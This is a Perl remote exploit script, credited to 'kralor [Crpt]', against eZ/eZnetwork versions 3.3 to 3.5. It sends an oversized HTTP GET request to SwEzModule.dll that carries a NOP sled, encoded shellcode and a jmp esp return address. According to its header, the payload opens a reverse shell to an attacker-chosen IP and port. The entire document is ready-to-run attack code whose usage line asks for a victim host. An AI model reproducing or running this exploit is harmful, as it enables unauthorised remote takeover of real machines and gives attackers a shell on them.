#!/usr/bin/perl -w
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# [Crpt] universal eZ v3.3 < v3.5 remote exploit by kralor [Crpt] #
#----------------------------------------------------------------------------------------#
# versions tested & not vulnerables: v3.0 v3.1 v3.2 #
# versions tested & vulnerables: v3.3 v3.4 v3.5 #
# Cryptso.dll contains a 'static' jmp esp in eZnetwork pack from v3.3 to v3.5 #
# It is a trivial exploit, jumping to esp, then at esp we jump backward to #
# finally reach the shellcode. The shellcode gives a reverse remote shell. #
# Universal shellcode coded by kralor with the PEB technic. #
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use IO::Socket;
print "\r\n\t [Crpt] eZ v3.3 < v3.5 remote exploit by kralor [Crpt]\r\n";
print "\t\twww.coromputer.net && undernet #coromputer\r\n\r\n";
if(@ARGV<3||@ARGV>3) {
print "syntax: ".$0." <victim> <your_ip> <your_port>\r\n";
exit;
}
print "[+] Connecting to ".$ARGV[0]."\t...";
my $sock = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>"80");
if(!$sock) {
print "Error\r\n";
exit;
}
print "Done\r\n";
# 0xffe4 jmp esp in Cryptso.dll (v3.3 v3.4 v3.5 @ 0x1004C72B)
# 0xffffedffe9 jmp back ($ - 4'608)
$eip = "\x2B\xC7\x04\x10";
$jmp_back = "\xE9\xFF\xED\xFF\xFF";
# universal reverse remote shell using PEB, coded by kralor.
$shellc0deI = "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef".
"\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\x9e\x01\x80\x33\x95".
"\x43\xe2\xfa\x7e\xe6\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e".
"\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad".
"\x8b\xe0\xd9\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d".
"\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96".
"\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3".
"\xae\xe1\xb1\x8d\xe1\x9f\xde\xb6\x4e\xe0\x7f\xcd\xcd\xa6\x55\x56".
"\xca\xa6\x5c\xf3\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e".
"\x8d\x1e\x56\xae\x54\xe0\x08\x56\xa6\x4e\xfd\xec\xd0\xed\xd4\xff".
"\x9f\xff\xde\xc6\x7d\xe9\x6a\x6a\x6a\xa6\x5c\x52\xd0\x69\xe2\xe6".
"\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8\x97\x1e\x48\xf3\x16\x7e".
"\x91\xc4\xc4\xc6\x6a\x45\xa6\x4e\x1c\xd0\x91\xfd\xe7\xf0\xe6\xe6".
"\xff\x9f\xff\xde\xc6\x7d\xde\x6a\x6a\x6a\x1e\xc8\x91\xa6\x6a\x52".
"\xd0\x69\xc2\xc6\xd4\xc6\x52\xd0\x95\xfa\xf6\xfe\xf0\x1c\xe8\x91".
"\xf3\x52\xd0\x91\xe1\xd4\x1e\x58\xf3\x16\x7c\x91\xc4\xc6\x6a\x45".
"\xa6\x4e\xc6\xc6\xc6\xc6\xd6\xc6\xd6\xc6\x6a\x45\x1c\xd0\x31\xfd".
"\xfb\xf0\xf6\xe1\xff\x96\xff\xc6\xff\x97\x7d\x93\x6a\x6a\x6a\xa6".
"\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97";
$shellc0deII = "\xff\x85\xc0\x6a\xe0\x31\x6a\x45\xa6".
"\x4e\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xc6\x7d\x40\x6b\x6a\x6a".
"\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d\x1c".
"\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52\xd0".
"\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xc8\x31\x1c\xc8".
"\x71\x1c\xc8\x7d\x1c\xc8\x79\xa6\x4e\x18\xd8\x65\xc4\x18\xd8\x39".
"\xc4\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52".
"\xd0\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xa6\x4e".
"\xfd\xed\xfc\xe1\xc5\xff\x94\xff\xde\xc6\x7d\xf3\x6b\x6a\x6a\x6a".
"\x45\x95";
my $tip = inet_aton($ARGV[1]);
my $paddr = sockaddr_in($ARGV[2], $tip);
$paddr=substr($paddr,2,6);
$paddr=$paddr^"\x95\x95\x95\x95\x95\x95";
my $rport=substr($paddr,0,2);
my $rip=substr($paddr,2,4);
$request = "GET /SwEzModule.dll?operation=login&autologin=".
"\x90"x100 .$shellc0deI.$rport."\x96\x46\x52\x97".$rip.$shellc0deII.
"\x90"x4103 .$eip."\x90"x4 .$jmp_back." HTTP/1.0\r\n\r\n";
print $sock $request;
print "[+] Sending evil request\t...";
close($sock);
print "Done\r\n";
exit;
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